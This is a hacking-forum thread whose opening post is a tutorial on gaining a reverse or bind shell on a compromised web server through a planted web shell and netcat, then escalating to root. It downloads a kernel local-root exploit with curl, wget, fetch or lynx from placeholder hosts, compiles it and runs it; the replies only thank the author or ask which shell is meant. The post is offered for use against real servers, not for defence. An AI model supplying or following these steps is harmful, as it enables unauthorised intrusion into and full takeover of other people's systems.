Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[TUT] Back Connect And R00ting [TUT] filter_list
Author
Message
[TUT] Back Connect And R00ting [TUT] #1

++
[+]Tutorial Name: BackCoonect And R00ting +
[+]Tutorial By dR.EviL +
++
[#]Tools For This Tutorial
[1]*1 SHell ,
[2]Netcat
[3]Open Port. (I will use 5992 but u can use any open port.)
++

Lets start

: - BackConnect - :

[First Step]-Backdoor host.
[Second Step]-Backconnect.
++
1SmileBackdoor host.

Go To Ur Shell And Click Backdoor .Then Enter The Port And Click Bind
Now just copy and paste it on the netcat and hit enter.
Code:
nc Ip 5992

And you will get backconnected to the server.

2SmileBackconnect.
Sometimes you will not be able to backconnect to a server using Backdoor Host option.So u can try Backconnect .Click Backoonect To ur shell .Open netcat and then use the following code
Code:
nc -lvnp 5992
(5992 Is My Open Port)
Now go to ur shell and click connect.. u will be connected with shell .

So Now we are in the Webserver and now if you type this command
Code:
whoami
: - R00ting - :

Enter this command to se the Kernel Version
Code:
uname -a
and it will show something like this
Code:
--==Systeminfo==-- Linux target host 2.6.1.17-194 ...etc --==Userinfo==-- uid=48(apache) gid=48(apache) groups=48(apache)
so our Kernal Version is 2.6.17-194
Now search for on different sites or on google for Local Root 2.6.17-194
And Download it Using One of the following commands
Code:
curl -o expl.c http://xx lwp-download http://xx wget http://xx fetch -o expl.c -p http://xx lynx -source http://xx > expl.c links -source http://xx > expl.c

Download the r00t exploit by using this command
Code:
wget http://www.xx.com/localroot.c
Enter this command to compile the source and make it executatble file
Code:
gcc -o expl localroot.c
Then set the permision using
Code:
chmod +x expl
chmod +777 expl
Now Excecute the exploit with this command
Code:
./expl

Now u have r00t acces
Bye And s0rry For my gramar its terribile

Reply

RE: [TUT] Back Connect And R00ting [TUT] #2
thanks for the awesome tutorial..!

Reply

RE: [TUT] Back Connect And R00ting [TUT] #3
Tutorial looks like kinda advanced one Tongue

Reply

RE: [TUT] Back Connect And R00ting [TUT] #4
thanks my friend for this sharing

Reply

RE: [TUT] Back Connect And R00ting [TUT] #5
thanks my friend for this sharing

Reply

RE: [TUT] Back Connect And R00ting [TUT] #6
Quote:Go To Ur Shell And Click Backdoor .Then Enter The Port And Click Bind
which "Shell" ?

Reply

RE: [TUT] Back Connect And R00ting [TUT] #7
Quote:Go To Ur Shell And Click Backdoor .Then Enter The Port And Click Bind
which "Shell" ?

Reply